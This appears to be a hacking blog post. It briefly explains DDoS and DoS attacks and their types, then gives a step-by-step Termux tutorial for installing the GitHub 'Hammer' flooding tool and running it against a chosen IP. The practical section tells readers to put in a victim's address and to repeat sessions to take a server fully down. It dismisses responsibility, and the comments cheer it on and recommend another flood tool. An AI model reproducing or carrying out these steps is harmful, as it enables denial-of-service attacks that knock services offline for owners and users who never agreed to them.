Disclaimer: The tutorials in our blog are solely for educational purposes. They do not substitute professional advice or services.
Please wait 0 seconds...
Scroll Down and click on CONTINUE➡️ for destination
Congrats! Your Link is Generated

What is DDOS Attack?


What is DDoS?

DDoS is short for Distributed Denial oService. DDoS is a type of DOS attack where multiple compromised systems, which are often infected with Trojan, are used to target a single system causing a Denial of Service (DoS) attack. Victims of a DDoS attack consist of both the end targeted system and all systems maliciously used and controlled by the hacker in the distributed attack.


Difference Between DDoS And DoS Attack.

A Denial of Service (DoS) attack is different from a DDoS attack. The DoS attack typically uses one computer and one Internet connection to flood a targeted system or resource. The DDoS attack uses multiple computers and Internet connections to flood the targeted resource(server). DDoS attacks are often global attacks, distributed via botnets.


How DDoS Works?

In a DDoS attack, the incoming traffic flooding the victim originates from many different sources – potentially hundreds of thousands or more. This effectively makes it impossible to stop the attack simply by blocking a single IP address; plus, it is very difficult to distinguish legitimate user traffic from attack traffic when spread across so many points of origin.


What are the Types of DDoS Attacks?


There are many types of DDoS attacks. Some common attacks include the followings:
  • Traffic attacks: Traffic flooding attacks send a huge volume of TCP, UDP and ICPM packets to the target. Legitimate requests get lost and these attacks may be accompanied by malware exploitation.
  • Bandwidth attacks: This DDos attack overloads the target with massive amounts of junk data. This results in a loss of network bandwidth and equipment resources and can lead to a complete denial of service.
  • Application attacks: Application-layer data messages can deplete resources in the application layer, leaving the target's system services unavailable.      


#All these are some basic theories of DDoS And DoS Attack





  💻 LETS START THE PRACTICAL STEP BY STEP🖱


In my first post of hacking someone's phone/pc with ip address I have said you to install Termux (android terminal emulator ) from your phones Google Play store so if you have not installed Termux on your phone then do it now! Cz for performing DDoS attack on your phone you will need The Termux Application installed on your phone..


STEP1


Please always enter these commands in your terminal before using any tools on your Termux application :



apt update
apt upgrade -y

STEP2 


As we are going to use a python based tool called Hammer for performing the DDoS so we have to install the python package in our terminal.Use the command given below to install the package :

pkg install python

STEP3


For installing the Hammer tool from github we need to install the package given below :

pkg install git

STEP4 


Now just enter the following commands on your Termux terminal to start the installation and set up process :

git clone https://github.com/cyweb/hammer
cd hammer
ls
chmod +x hammer.py

Here chmod +x hammer.py gives the execution permission to the tool!

STEP5


Now you are good to go to use the tool and start your DDoS attack on any IP/website/server etc...

Enter the command given below to start the DDoS attack!!!
python hammer.py -s 127.0.0.1 -p 80 -t 135

[127.0.0.1 is just an example you can use your victims IP address in that field]

After entering the above command your DDoS attack will start.....

💡Tips: To make the victims server fully down just repeat the method in more sessions....


                         ERROR 404


CONGRATS NOW YOU HAVE LEARNED HOW TO PERFORM DDoS attack but REMEMBER USE IT ON YOUR OWN RISK,IF ANY THINGS HAPPENS REALLY BAD I WILL NOT BE RESPONSIBLE FOR IT!!! 


FEEL FREE TO COMMENT DOWN BELOW IF ANY ERRORS OCCURS DURING THE INSTALLATION OF THE TOOL!!!

AND AT LAST MAKE SURE TO SUBSCRIBE TO OUR NEWSLETTER SERVICE TO GET NOTIFIED ABOUT MY NEW AND LATEST POSTS!

************************************************

3 comments

  1. Wow great work bro! Xerxes for pc also works great! Xerxes r karoneo bonabi sun!
  2. 😮
  3. It works great 😍
Cookie Consent
We serve cookies on this site to analyze traffic, remember your preferences, and optimize your experience.
Oops!
It seems there is something wrong with your internet connection. Please connect to the internet and start browsing again.
AdBlock Detected!
We have detected that you are using adblocking plugin in your browser.
The revenue we earn by the advertisements is used to manage this website, we request you to whitelist our website in your adblocking plugin.
Site is Blocked
Sorry! This site is not available in your country.